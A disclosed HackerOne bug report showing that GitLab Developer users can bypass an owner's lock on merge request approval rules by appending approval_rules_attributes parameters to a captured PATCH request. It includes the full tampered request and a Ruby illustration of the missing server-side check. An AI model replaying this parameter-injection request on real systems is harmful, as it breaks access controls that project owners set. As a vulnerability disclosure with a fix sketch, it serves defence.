Override approvers and approvals required per merge request despite no permissions
HackerOne report #544756 by ashish_r_padelkar on 2019-04-21, assigned to estrike:
Summary
Hello,
The Owner/Maintainer of the project may prevent overriding of approvers and approvals required per merge request by enabling the settings below in the project settings.
However, Developer users can still create new approval rules per merge request!
Steps to reproduce
- As a project owner, set a setting like the one below for the merge request approval rule.
- As a Developer user in the project, go to any merge request and EDIT it. Once it reloads, you will see that you cannot EDIT or create new approval rules.
- Without doing anything else, just click on Save and capture the request below:
POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 542  
Cache-Control: max-age=0  
Origin: https://gitlab.com  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false

utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=ExampleMergeRequest&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=
- Append the parameters below to the above request:
&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1
where 3148078 is my user ID; you may try adding yours if mine doesn't work for you.
- So the final request would look like:
POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 542  
Cache-Control: max-age=0  
Origin: https://gitlab.com  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false

utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=WIP%3A+Resolve+%22yyyy%22&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1
- Send this request. Once done, click on EDIT merge request again and scroll down to approval rules.
- Now you should see the approval rule created even though the owner did not allow it!
 
What is the current bug behavior?
A Developer can override the merge request approval rules despite the settings made by the owner!
What is the expected correct behavior?
A Developer should not be allowed to create an approval rule when the owner does not allow it.
Output of checks
This bug happens on GitLab.com and probably on omnibus installations too!
Regards,
Ashish
Impact
Developers can override approval rule settings.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
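The request above works because the nested `merge_request[approval_rules_attributes]` parameters are accepted by the update endpoint without consulting the project-level "prevent overriding" setting. The following Ruby is an added example, not GitLab's code, that models the missing check: it parses a form body shaped like the captured request, shows a vulnerable strong-parameters filter that permits the nested attributes for every editor, and a hardened filter that drops them when the project disallows per-merge-request overrides. The setting name `disable_overriding_approvers_per_merge_request`, the `Project` struct and all function names are assumptions chosen for illustration.

```ruby
# Added example, not GitLab's code: a minimal model of the server-side check this
# report shows to be missing. The setting name
# `disable_overriding_approvers_per_merge_request`, the Project struct and the
# function names are assumptions for illustration only.
require 'uri'

Project = Struct.new(:disable_overriding_approvers_per_merge_request, keyword_init: true)

# Constructed form body modelled on the captured PATCH request (headers omitted).
CAPTURED_BODY = 'utf8=%E2%9C%93&_method=patch' \
                '&merge_request%5Btitle%5D=ExampleMergeRequest' \
                '&merge_request%5Btarget_branch%5D=master'
# The three parameters the report appends to that body.
INJECTED_PARAMS = '&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer' \
                  '&merge_request[approval_rules_attributes][][user_ids][]=3148078' \
                  '&merge_request[approval_rules_attributes][][approvals_required]=1'

# Parse the body into {top => {sub => value}} with one level of nesting; anything
# deeper (the approval_rules_attributes entries) is kept as [path, value] pairs.
# Enough to see which keys reach the controller without reimplementing Rack.
def parse_form(body)
  URI.decode_www_form(body).each_with_object({}) do |(key, value), params|
    m = key.match(/\A([^\[]+)\[([^\]]*)\](.*)\z/)
    if m.nil?
      params[key] = value
    else
      top, sub, rest = m.captures
      params[top] ||= {}
      if rest.empty?
        params[top][sub] = value
      else
        (params[top][sub] ||= []) << [rest, value]
      end
    end
  end
end

# Vulnerable shape: the nested approval rule attributes are permitted for every user
# who can edit the merge request, so the project setting is never consulted.
def vulnerable_merge_request_params(params)
  params.fetch('merge_request').slice('title', 'description', 'target_branch', 'approval_rules_attributes')
end

# Hardened shape: approval_rules_attributes is only permitted when the project allows
# per-merge-request overrides; otherwise it is dropped and reported so the caller can
# log the attempt instead of silently applying it.
def hardened_merge_request_params(params, project)
  permitted_keys = %w[title description target_branch]
  permitted_keys << 'approval_rules_attributes' unless project.disable_overriding_approvers_per_merge_request
  supplied = params.fetch('merge_request')
  {
    permitted: supplied.slice(*permitted_keys),
    rejected: supplied.keys - permitted_keys
  }
end

if __FILE__ == $PROGRAM_NAME
  params = parse_form(CAPTURED_BODY + INJECTED_PARAMS)
  locked = Project.new(disable_overriding_approvers_per_merge_request: true)
  puts "vulnerable keeps: #{vulnerable_merge_request_params(params).keys.inspect}"
  result = hardened_merge_request_params(params, locked)
  puts "hardened keeps: #{result[:permitted].keys.inspect}, rejected: #{result[:rejected].inspect}"
end
```

The point of the hardened version is that the permitted key list is computed from the project state before the attributes are handed to the model, so the nested `approval_rules_attributes` never reaches `update` when the owner has locked the approval rules, regardless of what the client appends to the form body.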

